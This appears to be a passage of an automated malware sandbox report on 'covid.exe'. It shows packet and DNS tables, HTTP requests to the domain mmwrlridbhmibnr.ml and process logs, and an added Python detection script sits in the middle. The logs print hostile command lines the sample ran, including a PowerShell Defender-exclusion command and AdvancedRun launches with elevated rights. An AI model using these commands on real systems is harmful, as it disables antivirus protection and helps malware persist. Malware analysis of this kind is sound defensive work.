                                                                Apr 20, 2021 22:59:12.251354933 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.251394033 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.251491070 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.251885891 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.251910925 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.251960039 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.253123045 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.253155947 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.253201008 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.254389048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.254422903 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.254458904 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.255589008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.255621910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.255660057 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.256850004 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.256885052 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.256927013 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.258069992 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.258120060 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.258141994 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.259304047 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.259340048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.259386063 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.260538101 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.260572910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.260629892 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.261760950 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.261797905 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.261840105 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.263015985 CEST8049702172.67.220.147192.168.2.7

                                                                UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 20, 2021 22:59:03.480581045 CEST | 61242 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:03.537749052 CEST | 53 | 61242 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:03.765964985 CEST | 58562 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:03.825591087 CEST | 53 | 58562 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:03.973659039 CEST | 56590 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:04.027196884 CEST | 53 | 56590 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:04.445034027 CEST | 60501 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:04.494206905 CEST | 53 | 60501 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:05.320496082 CEST | 53775 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:05.372695923 CEST | 53 | 53775 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:06.156315088 CEST | 51837 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:06.219965935 CEST | 53 | 51837 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:06.284997940 CEST | 55411 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:06.333602905 CEST | 53 | 55411 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:07.662137032 CEST | 63668 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:07.710809946 CEST | 53 | 63668 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:08.576298952 CEST | 54640 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:08.625125885 CEST | 53 | 54640 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:09.513241053 CEST | 58739 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:09.571078062 CEST | 53 | 58739 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:11.542737961 CEST | 60338 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:11.605129004 CEST | 53 | 60338 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:11.752775908 CEST | 58717 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:11.812586069 CEST | 53 | 58717 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:13.555123091 CEST | 59762 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:13.605463982 CEST | 53 | 59762 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:14.283757925 CEST | 54329 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:14.332566023 CEST | 53 | 54329 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:15.263148069 CEST | 58052 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:15.311777115 CEST | 53 | 58052 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:16.190433979 CEST | 54008 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:16.239104986 CEST | 53 | 54008 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:17.707003117 CEST | 59451 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:17.755932093 CEST | 53 | 59451 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:18.667550087 CEST | 52914 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:18.728842020 CEST | 53 | 52914 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:19.731760979 CEST | 64569 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:19.791662931 CEST | 53 | 64569 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:20.680387020 CEST | 52816 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:20.738553047 CEST | 53 | 52816 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:21.992486954 CEST | 50781 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:22.041332960 CEST | 53 | 50781 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:22.905011892 CEST | 54230 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:22.953547955 CEST | 53 | 54230 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:23.989623070 CEST | 54911 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:24.048361063 CEST | 53 | 54911 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:24.995657921 CEST | 49958 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:25.044671059 CEST | 53 | 49958 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:27.789151907 CEST | 50860 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:27.848284006 CEST | 53 | 50860 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:27.879282951 CEST | 50452 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:27.927898884 CEST | 53 | 50452 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:29.292191029 CEST | 59730 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:29.350326061 CEST | 53 | 59730 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:49.660680056 CEST | 59310 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:49.711036921 CEST | 53 | 59310 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 22:59:58.639651060 CEST | 51919 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 22:59:58.700697899 CEST | 53 | 51919 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:00:27.371499062 CEST | 64296 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:00:27.435833931 CEST | 53 | 64296 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:00:32.092233896 CEST | 56680 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:00:32.153212070 CEST | 53 | 56680 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:00:43.199078083 CEST | 58820 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:00:43.259835005 CEST | 53 | 58820 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:00:56.495156050 CEST | 60983 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:00:56.548681974 CEST | 53 | 60983 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:00:57.553138018 CEST | 49247 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:00:57.713815928 CEST | 53 | 49247 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:00:58.205868959 CEST | 52286 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:00:58.281033993 CEST | 53 | 52286 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:00:58.766174078 CEST | 56064 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:00:58.830171108 CEST | 53 | 56064 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:00:59.729046106 CEST | 63744 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:00:59.786192894 CEST | 53 | 63744 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:01:00.913100958 CEST | 61457 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:01:01.007164955 CEST | 53 | 61457 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:01:02.242635012 CEST | 58367 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:01:02.302493095 CEST | 53 | 58367 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:01:03.202275991 CEST | 60599 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:01:03.319674969 CEST | 53 | 60599 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:01:05.239972115 CEST | 59571 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:01:05.297350883 CEST | 53 | 59571 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:01:06.829117060 CEST | 52689 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:01:06.892360926 CEST | 53 | 52689 | 8.8.8.8 | 192.168.2.7
Apr 20, 2021 23:01:07.797477007 CEST | 50290 | 53 | 192.168.2.7 | 8.8.8.8
Apr 20, 2021 23:01:07.848229885 CEST | 53 | 50290 | 8.8.8.8 | 192.168.2.7

                                                                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 20, 2021 22:59:11.542737961 CEST | 192.168.2.7 | 8.8.8.8 | 0xd719 | Standard query (0) | mmwrlridbhmibnr.ml | A (IP address) | IN (0x0001)

                                                                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 20, 2021 22:59:11.605129004 CEST | 8.8.8.8 | 192.168.2.7 | 0xd719 | No error (0) | mmwrlridbhmibnr.ml | (none) | 172.67.220.147 | A (IP address) | IN (0x0001)
Apr 20, 2021 22:59:11.605129004 CEST | 8.8.8.8 | 192.168.2.7 | 0xd719 | No error (0) | mmwrlridbhmibnr.ml | (none) | 104.21.86.143 | A (IP address) | IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • mmwrlridbhmibnr.ml

                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49702 | 172.67.220.147 | 80 | C:\Users\user\Desktop\covid.exe
Timestamp | kBytes transferred | Direction | Data
Apr 20, 2021 22:59:11.684930086 CEST | 532 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1
                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                Host: mmwrlridbhmibnr.ml
                                                                Connection: Keep-Alive
Apr 20, 2021 22:59:11.937634945 CEST | 534 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 20 Apr 2021 20:59:11 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=def339989e5b144f74108a03997626ea81618952351; expires=Thu, 20-May-21 20:59:11 GMT; path=/; domain=.mmwrlridbhmibnr.ml; HttpOnly; SameSite=Lax
                                                                Last-Modified: Mon, 19 Apr 2021 16:43:45 GMT
                                                                Vary: Accept-Encoding
                                                                X-Frame-Options: SAMEORIGIN
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0992ad87ea00004c61831a9000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SojOEnCzNZOcpPH9V09NVNMKi30bi5e6KyB4nFY2c8aLPsTGisEWiLNZoO29IbkhzyrdYcOM7hA4Ek3c%2Bd4pVRadrnwGEJy3dL9c0PXzBSaGYu4%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 64314b864a8a4c61-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70
                                                                Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href="https://i2-p
Apr 20, 2021 22:59:14.111917019 CEST | 1897 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1
                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                Host: mmwrlridbhmibnr.ml
Apr 20, 2021 22:59:14.335450888 CEST | 1899 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 20 Apr 2021 20:59:14 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=d42fb9142b77b1729aa1493c5d642785b1618952354; expires=Thu, 20-May-21 20:59:14 GMT; path=/; domain=.mmwrlridbhmibnr.ml; HttpOnly; SameSite=Lax
                                                                Last-Modified: Mon, 19 Apr 2021 16:43:47 GMT
                                                                Vary: Accept-Encoding
                                                                X-Frame-Options: SAMEORIGIN
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0992ad916500004c61b3360000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HYSCakQjfwectyu0TrGfii9TUdtoyg%2BiZr73ZnJbZjdPnW7Wzs%2BD%2Bo1IU7nTZp5FGx3vulWIlq3AYfw%2F8WfXWKOU9PPB8oQHT6jqOrfg%2FF0zkOU%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 64314b956d844c61-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 62 36 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                Data Ascii: b61<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href="https
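Both requests above are worth a second look before writing a network signature: the browser identification is sent under a header named "UserAgent" (no hyphen), so a conforming parser sees no User-Agent header at all; the value claims an X11/Linux Opera build although the sender is a Windows process; no Accept header is present; and each path ends in a 32-character hex token before ".html", while the response body is a copy of a liverpool.com article page served through Cloudflare. The Python below is an added example, not part of this report or of the analysed sample, that turns those observations into checks over a raw request. The first sample request is the one captured above with CRLF line endings assumed; the second is a constructed benign request for contrast; treating the hex token as a client or campaign identifier is an assumption.

```python
import re
from typing import Dict, List

# Request text as shown in the capture above; CRLF line endings are assumed,
# since the report renders one header per line.
OBSERVED_REQUEST = (
    "GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-"
    "A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1\r\n"
    "UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41\r\n"
    "Host: mmwrlridbhmibnr.ml\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed benign request for contrast; not from the report.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0\r\n"
    "Accept: text/html,*/*;q=0.8\r\n"
    "\r\n"
)

# 32 hex characters: the shape of the token that ends both captured paths.
HEX32 = re.compile(r"[0-9A-Fa-f]{32}")


def parse_request(raw: str) -> Dict[str, object]:
    """Split an HTTP/1.x request into its request line and a header dict.

    Header names are lower-cased, so 'UserAgent' and 'User-Agent' remain
    distinct keys; a repeated header keeps its last value."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def analyse_request(raw: str, client_os: str = "windows") -> List[str]:
    """Return finding labels for one request. client_os is what endpoint
    telemetry says the sending host runs (the sandbox above is Windows)."""
    req = parse_request(raw)
    headers = req["headers"]
    target = req["target"]
    findings = []

    # Any header whose name collapses to 'useragent' once separators are dropped.
    ua_like = [n for n in headers if n.replace("-", "").replace("_", "") == "useragent"]
    if "user-agent" not in headers:
        findings.append("no_user_agent")
        for name in ua_like:
            findings.append("malformed_ua_header:" + name)

    ua_value = headers.get(ua_like[0], "") if ua_like else ""
    if client_os == "windows" and "Linux" in ua_value:
        findings.append("ua_platform_mismatch")

    if "accept" not in headers:
        findings.append("no_accept_header")  # browsers always send Accept

    if HEX32.search(target):
        findings.append("hex32_token_in_path")  # assumed: client/campaign identifier

    return findings


if __name__ == "__main__":
    for label, raw in (("observed", OBSERVED_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, analyse_request(raw))
```

The misspelled header name is the most robust of these signals: a real browser never emits it, and it survives changes of domain, path and page content, all of which this sample can vary freely. The platform mismatch only works when the detection has endpoint context, which a network sensor alone does not.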


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior


                                                                System Behavior

                                                                General

                                                                Start time:22:59:09
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\Desktop\covid.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\covid.exe'
                                                                Imagebase:0x460000
                                                                File size:39624 bytes
                                                                MD5 hash:99E3B458DEE79B33209D39D19692AE08
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                General

                                                                Start time:22:59:28
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                General

                                                                Start time:22:59:33
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

General

Start time: 22:59:38
Start date: 20/04/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Imagebase: 0xba0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 22:59:39
Start date: 20/04/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Imagebase: 0xba0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 22:59:39
Start date: 20/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 22:59:39
Start date: 20/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 22:59:39
Start date: 20/04/2021
Path: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 3%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 22:59:52
Start date: 20/04/2021
Path: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
Wow64 process (32bit): true
